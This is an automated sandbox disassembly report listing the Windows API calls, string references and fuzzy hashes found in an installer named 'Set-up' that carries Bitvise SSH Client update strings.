                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CommandConsoleException@8LineThrowTitle
                                                                                                                                  • String ID: %$Bitvise SSH Client Update
                                                                                                                                  • API String ID: 97332920-3733305414
                                                                                                                                  • Opcode ID: 525f6e2ac3948cfd8fbb3fe28a82d99004fab9f9c3ab87b53bd5065ec085a30e
                                                                                                                                  • Instruction ID: bd5c7a0863877b21d8154c20065f41da7bea4e625462d7a1947695ea79bea2c9
                                                                                                                                  • Opcode Fuzzy Hash: 525f6e2ac3948cfd8fbb3fe28a82d99004fab9f9c3ab87b53bd5065ec085a30e
                                                                                                                                  • Instruction Fuzzy Hash: E6615B30C05299DAEB25EB64CD59BEEBBB4AF11304F1051EAD045B3192DB741F88CFA2
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E3C7CA
                                                                                                                                    • Part of subcall function 00E59DF0: OpenProcessToken.ADVAPI32(00000000,00000008,460C02D8,460C02D8,?), ref: 00E59E1F
                                                                                                                                    • Part of subcall function 00E59DF0: GetLastError.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000,01166088,000000FF), ref: 00E59E2B
                                                                                                                                    • Part of subcall function 00E59DF0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E59E5A
                                                                                                                                    • Part of subcall function 00E3B710: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3B78B
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E3C83B
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E3C892
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Current$Exception@8Throw$ErrorLastOpenToken
                                                                                                                                  • String ID: %
                                                                                                                                  • API String ID: 2882612034-2567322570
                                                                                                                                  • Opcode ID: 50a46f02b1fdb63e721623f7f1f467e3c9aaf75acc8883d941fbf96d482426bd
                                                                                                                                  • Instruction ID: f7a8dd58580e576f183c615758a9851ec79dc70b6ca954324cf74f7f9e181131
                                                                                                                                  • Opcode Fuzzy Hash: 50a46f02b1fdb63e721623f7f1f467e3c9aaf75acc8883d941fbf96d482426bd
                                                                                                                                  • Instruction Fuzzy Hash: 7151B331D04288CADB19EB78D9597EDBFB0AF25304F2450E9D445B7292DB30AB48CB62
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00E6B5F7
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6B601
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B645
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8FileLastThrowWrite
                                                                                                                                  • String ID: WriteFile()
                                                                                                                                  • API String ID: 3863794488-2764729538
                                                                                                                                  • Opcode ID: caa29d7f06972366b30bce0e030d12db71852aa1fb3167769c3ce0b9553ed1cd
                                                                                                                                  • Instruction ID: 5b43e30656f0d791be9deb499aa8352fdc557e3fe232283eeff53b3b2addd1e0
                                                                                                                                  • Opcode Fuzzy Hash: caa29d7f06972366b30bce0e030d12db71852aa1fb3167769c3ce0b9553ed1cd
                                                                                                                                  • Instruction Fuzzy Hash: E241AC75A00618DFCF18DF54D994AAEBBF8FF08754F004469E812AB395DB34AD49CBA0
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 00E6B774
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 00E6B77E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B7C2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8FileLastReadThrow
                                                                                                                                  • String ID: ReadFile()
                                                                                                                                  • API String ID: 359733464-1174911424
                                                                                                                                  • Opcode ID: 5972fef5c03cce910c470f1ab0d4d449b8bed10e9ed97389c038ca438819b0c0
                                                                                                                                  • Instruction ID: 02b266c48c3ccecb1ccafec12f69f61844b89458267ba5dbaea387cf5ffe3ce2
                                                                                                                                  • Opcode Fuzzy Hash: 5972fef5c03cce910c470f1ab0d4d449b8bed10e9ed97389c038ca438819b0c0
                                                                                                                                  • Instruction Fuzzy Hash: 0F415975A00219DFCF18DF64D894AAEBBB8FF08754F004569E812AB395DB34BD49CB90
                                                                                                                                  APIs
                                                                                                                                  • MoveFileExW.KERNEL32(00000000,00000000,00000004,?,?,?,460C02D8), ref: 00E6BE2D
                                                                                                                                  • GetLastError.KERNEL32(?,460C02D8), ref: 00E6BE48
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6BE8C
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorExceptionException@8FileLastMoveRaiseThrow
                                                                                                                                  • String ID: MoveFileExW()
                                                                                                                                  • API String ID: 1464417811-2966240118
                                                                                                                                  • Opcode ID: 4297ecdc29b367fa0d11b8a4bf0f882c98d61f85d7df261ff0db0659c99bd39c
                                                                                                                                  • Instruction ID: 644b96f63d2fbf46849677cc04c438a3e84ca33c91a15574b341c5015335146e
                                                                                                                                  • Opcode Fuzzy Hash: 4297ecdc29b367fa0d11b8a4bf0f882c98d61f85d7df261ff0db0659c99bd39c
                                                                                                                                  • Instruction Fuzzy Hash: 1D31ADB0901249EFDB14DFA5D958BEEBBF8FF04314F108169E415A7280D7796A08CFA0
                                                                                                                                  APIs
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000001,460C02D8,00000000,00000000), ref: 00F06C4F
                                                                                                                                    • Part of subcall function 00E48820: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000000FF,?,00E31075), ref: 00E4885A
                                                                                                                                    • Part of subcall function 00E48820: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,000000FF,?,00E31075), ref: 00E48879
                                                                                                                                    • Part of subcall function 00E48820: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,000000FF,?,00E31075), ref: 00E48892
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00F06C6A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F06CD7
                                                                                                                                  Strings
                                                                                                                                  • ThreadObject::Setup: CreateEvent() failed - , xrefs: 00F06CA3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CloseCreateEventException@8HandleThrow
                                                                                                                                  • String ID: ThreadObject::Setup: CreateEvent() failed -
                                                                                                                                  • API String ID: 4147431150-1160059298
                                                                                                                                  • Opcode ID: 3129cfa9675f0c0f48d261d11094cc38f66b56b830ce44d166ac333465b226b4
                                                                                                                                  • Instruction ID: 823c9c9cd32413bee9f534074fb6d7180fc764fe0445c82e325a002e347a92ce
                                                                                                                                  • Opcode Fuzzy Hash: 3129cfa9675f0c0f48d261d11094cc38f66b56b830ce44d166ac333465b226b4
                                                                                                                                  • Instruction Fuzzy Hash: 9931C371A00208AFCB19EFA4DC45F9EBBB8EF48720F108569F519E72D1DB75A504CB90
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00F005C0: InitializeCriticalSection.KERNEL32(013199FC,?,011083F9,?,00000000), ref: 00F005C4
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0110840F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalInit_thread_footerInitializeSection
                                                                                                                                  • String ID: ERROR: $Trace: $Warning:
                                                                                                                                  • API String ID: 2684443898-3985709694
                                                                                                                                  • Opcode ID: f08b8b899194baa6ba35aa9cc070a2f8ec3aeb022d80a75c028d9a0d233e8e3d
                                                                                                                                  • Instruction ID: 2ddf78ede94f9641feda136577648562ffb60f739809a8cf255e5ce5c55c7702
                                                                                                                                  • Opcode Fuzzy Hash: f08b8b899194baa6ba35aa9cc070a2f8ec3aeb022d80a75c028d9a0d233e8e3d
                                                                                                                                  • Instruction Fuzzy Hash: 78310931E44245EBCF29DF68DC52B6DB7B1EB04B28F01462DE951A72C5DBB06904CB91
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6AC80
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 00E6ACAD
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6ACD8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorExceptionException@8LastObjectRaiseSingleThrowWait
                                                                                                                                  • String ID: WaitForSingleObject()
                                                                                                                                  • API String ID: 4210095878-2408256805
                                                                                                                                  • Opcode ID: 12e9508544c7de09e9f93df939a7411528252833e02394a642e395de89e5e380
                                                                                                                                  • Instruction ID: 2cd63551f62c04e16383ee4cbcbe363bfd40917605fffb5a7900c2a59c5452b1
                                                                                                                                  • Opcode Fuzzy Hash: 12e9508544c7de09e9f93df939a7411528252833e02394a642e395de89e5e380
                                                                                                                                  • Instruction Fuzzy Hash: C51129313141059BC618EB28EC46B6DB7A1EF94324F004276F9259B2D0CB706C50C7D2
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: P\$RefPtrConst<class VersionInfo>::GetRef$m_ptr != nullptr
                                                                                                                                  • API String ID: 0-1279626962
                                                                                                                                  • Opcode ID: 6661c075ee7ae81078ca22b7f8ac3474c91358ce08e5feaa13ac70f94af379af
                                                                                                                                  • Instruction ID: 85eaf372827bc4c30b34f86d3a503e673036ed436ef468d7ea2454656924c2ae
                                                                                                                                  • Opcode Fuzzy Hash: 6661c075ee7ae81078ca22b7f8ac3474c91358ce08e5feaa13ac70f94af379af
                                                                                                                                  • Instruction Fuzzy Hash: 1E1106B1605700AFD729EF64C805B9AB3F8FB40714F00466EE46EA3A81DF75B900CB50
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 00E5E061
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E5E06E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5E0F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorException@8LastProcThrow
                                                                                                                                  • String ID: GetProcAddress(
                                                                                                                                  • API String ID: 3662558089-3397178597
                                                                                                                                  • Opcode ID: c05a206fb06773df12ab07767dedd2720d8219698f81e7dca6af3a3ae0db8e41
                                                                                                                                  • Instruction ID: b310d66083cf04ca4902563a05743d86fe3f9aafdba5b14613dcbda48e4fdedf
                                                                                                                                  • Opcode Fuzzy Hash: c05a206fb06773df12ab07767dedd2720d8219698f81e7dca6af3a3ae0db8e41
                                                                                                                                  • Instruction Fuzzy Hash: F521B071900244EBCB29DF64DD41B9BBBF9EF14708F10886AF855A7291E771EA08CB51
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6619E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E661A5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: c_ >= s_$datavect<unsigned char>::append
                                                                                                                                  • API String ID: 118556049-4044520967
                                                                                                                                  • Opcode ID: 369e5e1b5f2ec3215822857f6a3f3fc8bb4a5a535cf15dc9cc078304d8e11972
                                                                                                                                  • Instruction ID: 157aadf0cc7f3306ffd92f0054b8ade94d9bd306e1b6dce4e07cf15260fbfc23
                                                                                                                                  • Opcode Fuzzy Hash: 369e5e1b5f2ec3215822857f6a3f3fc8bb4a5a535cf15dc9cc078304d8e11972
                                                                                                                                  • Instruction Fuzzy Hash: E7117A3235021017C724AA69EC1199FBBDDDF927E4B14893AFD58E7A81EA62ED008391
                                                                                                                                  APIs
                                                                                                                                  • CreateEventW.KERNEL32(460C02D8,00000000,00000000,00000001), ref: 00E82AF5
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E82B05
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E82B30
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorEventException@8LastThrow
                                                                                                                                  • String ID: CreateEvent()
                                                                                                                                  • API String ID: 381832486-3772053499
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00E6BA4A
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6BA55
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6BAB1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8FileLastPointerThrow
                                                                                                                                  • String ID: SetFilePointer()
                                                                                                                                  • API String ID: 1827965452-1438284906
                                                                                                                                  APIs
                                                                                                                                  • ReadConsoleInputW.KERNEL32(?,00000001,?,?,460C02D8), ref: 00E69FD2
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E69FDC
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6A020
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleErrorExceptionException@8InputLastRaiseReadThrow
                                                                                                                                  • String ID: ReadConsoleInputW()
                                                                                                                                  • API String ID: 379417519-401847460
                                                                                                                                  APIs
                                                                                                                                  • SetConsoleCursorPosition.KERNEL32(00E5F583,?,460C02D8,?,?), ref: 00E6533B
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65345
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65389
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  • SetConsoleCursorPosition(), xrefs: 00E65363
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCursorErrorExceptionException@8LastPositionRaiseThrow
                                                                                                                                  • String ID: SetConsoleCursorPosition()
                                                                                                                                  • API String ID: 3674480829-1064639240
                                                                                                                                  APIs
                                                                                                                                  • SetConsoleCursorInfo.KERNEL32(?,?,460C02D8), ref: 00E65239
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E65243
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65287
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCursorErrorExceptionException@8InfoLastRaiseThrow
                                                                                                                                  • String ID: SetConsoleCursorInfo()
                                                                                                                                  • API String ID: 2095948160-3360732971
                                                                                                                                  APIs
                                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00E5F0E1,?,460C02D8,00000000,00E62C18), ref: 00E65439
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E65443
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65487
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  • SetConsoleTextAttribute(), xrefs: 00E65461
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributeConsoleErrorExceptionException@8LastRaiseTextThrow
                                                                                                                                  • String ID: SetConsoleTextAttribute()
                                                                                                                                  • API String ID: 3711401018-872377736
                                                                                                                                  • Opcode ID: d48b99087334531aa6d7d10dba889e9f55e2a7261dfcbb6802452317194a69df
                                                                                                                                  • Instruction ID: cc13f6eb9de5e94a1fe0972ccd3a9823f1269f8e6d71ccdb3639f530e6e72227
                                                                                                                                  • Opcode Fuzzy Hash: d48b99087334531aa6d7d10dba889e9f55e2a7261dfcbb6802452317194a69df
                                                                                                                                  • Instruction Fuzzy Hash: B821B070A10209EFCB14DF65D954B9EFBF8FF04724F00866AE825A7394DB75AA04CB90
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCursorInfo.KERNEL32(?,?,460C02D8,?,?), ref: 00E65539
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65543
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65587
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCursorErrorExceptionException@8InfoLastRaiseThrow
                                                                                                                                  • String ID: GetConsoleCursorInfo()
                                                                                                                                  • API String ID: 2095948160-1023831658
                                                                                                                                  • Opcode ID: 45468d559f35a0711433d9dc1985b8ffbfca830a0152b3b10ce8b1c4806c6c6c
                                                                                                                                  • Instruction ID: 2fc7e3cd4d7ba69a8f945007c37c8887676ec42abc5dacd795d80d1f46dc7661
                                                                                                                                  • Opcode Fuzzy Hash: 45468d559f35a0711433d9dc1985b8ffbfca830a0152b3b10ce8b1c4806c6c6c
                                                                                                                                  • Instruction Fuzzy Hash: 922190B05002099FCB14DF55D958B9AFBF9FB04714F10866AE815A7390DB756A04CB90
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(?,?,460C02D8,?,?), ref: 00E65639
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65643
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65687
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  • GetConsoleScreenBufferInfo(), xrefs: 00E65661
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BufferConsoleErrorExceptionException@8InfoLastRaiseScreenThrow
                                                                                                                                  • String ID: GetConsoleScreenBufferInfo()
                                                                                                                                  • API String ID: 2627591521-3161664225
                                                                                                                                  • Opcode ID: 1d016bed24a8cb977c83942a3ef22d71eb8184d1a196d8c71e77f802d8ca54b2
                                                                                                                                  • Instruction ID: 321afda556007445ac594bc3c66222c0006164981a581d0c7fcf656786c2b084
                                                                                                                                  • Opcode Fuzzy Hash: 1d016bed24a8cb977c83942a3ef22d71eb8184d1a196d8c71e77f802d8ca54b2
                                                                                                                                  • Instruction Fuzzy Hash: 5D21AFB0A00209EFCB14DF55D958B9EFBF8FF04724F10866AE815A7394DB75AA04CB90
                                                                                                                                  APIs
                                                                                                                                  • FillConsoleOutputCharacterW.KERNEL32(?,00000020,?,?,?,?,?), ref: 00E6A118
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6A122
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6A17B
                                                                                                                                  Strings
                                                                                                                                  • FillConsoleOutputCharacterW(), xrefs: 00E6A155
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharacterConsoleErrorException@8FillLastOutputThrow
                                                                                                                                  • String ID: FillConsoleOutputCharacterW()
                                                                                                                                  • API String ID: 1530539340-1629237787
                                                                                                                                  • Opcode ID: 5a30eb050800bd36abfb189f3506e1ebb929d5ae146bca4c6cedc8b9ab92423b
                                                                                                                                  • Instruction ID: a0b2d5aecd484d427040866b842967c08b7f30771913a9275ba7a9d1f0a3921b
                                                                                                                                  • Opcode Fuzzy Hash: 5a30eb050800bd36abfb189f3506e1ebb929d5ae146bca4c6cedc8b9ab92423b
                                                                                                                                  • Instruction Fuzzy Hash: 2801C871204605AFC714EF24DC45E6ABBE4FB44750F00462DF961A3295DB70A815CB92
                                                                                                                                  APIs
                                                                                                                                  • WriteConsoleW.KERNEL32(460C02D8,?,?,00000000,00000000,?,?), ref: 00E6A078
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6A082
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6A0DB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleErrorException@8LastThrowWrite
                                                                                                                                  • String ID: WriteConsoleW()
                                                                                                                                  • API String ID: 221999844-2010213256
                                                                                                                                  • Opcode ID: 024b6f8939d5f5b16c7317dc7e95f5b25032789cdc542c9e1f680c9efe9c505e
                                                                                                                                  • Instruction ID: 62f982bc14455ab0931ca7e11b3740b75e4103b0bcc66474d4999e52d759c0aa
                                                                                                                                  • Opcode Fuzzy Hash: 024b6f8939d5f5b16c7317dc7e95f5b25032789cdc542c9e1f680c9efe9c505e
                                                                                                                                  • Instruction Fuzzy Hash: 1501C431604205AFC724EF24DC45F6ABBE8EB48720F104629F965932D4DB70B914CB92
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 010FF118
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  Strings
                                                                                                                                  • AutoApplyUpdates(), xrefs: 010FF0C5
                                                                                                                                  • Unrecognized update type., xrefs: 010FF0EF
                                                                                                                                  • BscUpdateSettings::AutoApplyUpdateType, xrefs: 010FF0C0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BreakConcurrency::cancel_current_taskDebugDebuggerException@8FileModuleNamePresentThrow
                                                                                                                                  • String ID: AutoApplyUpdates()$BscUpdateSettings::AutoApplyUpdateType$Unrecognized update type.
                                                                                                                                  • API String ID: 845167122-1603989448
                                                                                                                                  • Opcode ID: 9fae4f410396b3f674185b51286ea7404312335955f65b73ed570807bcf9049b
                                                                                                                                  • Instruction ID: 83e0e3b99c40d7e83dcde005d10687cf085a1c7931af48bda86dc49a158d2147
                                                                                                                                  • Opcode Fuzzy Hash: 9fae4f410396b3f674185b51286ea7404312335955f65b73ed570807bcf9049b
                                                                                                                                  • Instruction Fuzzy Hash: 01110672A48249ABD715DF6CD803B9DBBE4E705B20F00429EE96493BC0DB7665008684
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000000,?,?), ref: 00E65BAD
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E65BD8
